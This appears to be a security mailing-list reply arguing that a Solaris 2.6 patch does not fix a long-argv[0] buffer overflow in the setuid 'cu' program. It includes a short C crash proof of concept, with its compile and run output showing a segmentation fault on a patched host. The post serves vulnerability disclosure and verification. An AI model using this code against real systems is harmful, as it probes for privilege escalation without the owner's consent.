Hal King <[EMAIL PROTECTED]> writes:
> In Solaris 2.6, patch 106468-02 replaces cu; in Sol 7, patch 108372-01 replaces
> it for gets() use. The script does SegFault in 8, but no core file... I am
> running the 10/2000 revision, and 108372 came out in May, so it's probably cool.
Are you implying the above patches fix the cu long hardlink name
vulnerability? This is not the case, at least on 2.6:
# cat > cu_exploit.c
#include <stdio.h>
#include <stdlib.h>   /* malloc, atoi */
#include <string.h>   /* memset */
#include <unistd.h>   /* execl */
void main(int argc,char **argv)
{
char *buf;
/* argv[1]: length of the argv[0] string handed to cu, filled with 'A' */
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/usr/bin/cu",buf,(char *)0);
}
# gcc cu_exploit.c
cu_exploit.c: In function `main':
cu_exploit.c:4: warning: return type of `main' is not `int'
# a.out
Segmentation fault
# uname -a
SunOS shell1 5.6 Generic_105181-23 sun4m sparc SUNW,SPARCstation-5
# showrev -p | fgrep 106468-02
Patch: 106468-02 Obsoletes: Requires: Incompatibles: Packages: SUNWbnuu
# pkgchk -p /usr/bin/cu
ERROR: /usr/bin/cu
permissions <4111> expected <0111> actual
106468-02 was a patch from last summer, fixing an unspecified (but
presumably different) security problem in cu and uustat.
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
[EMAIL PROTECTED] | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.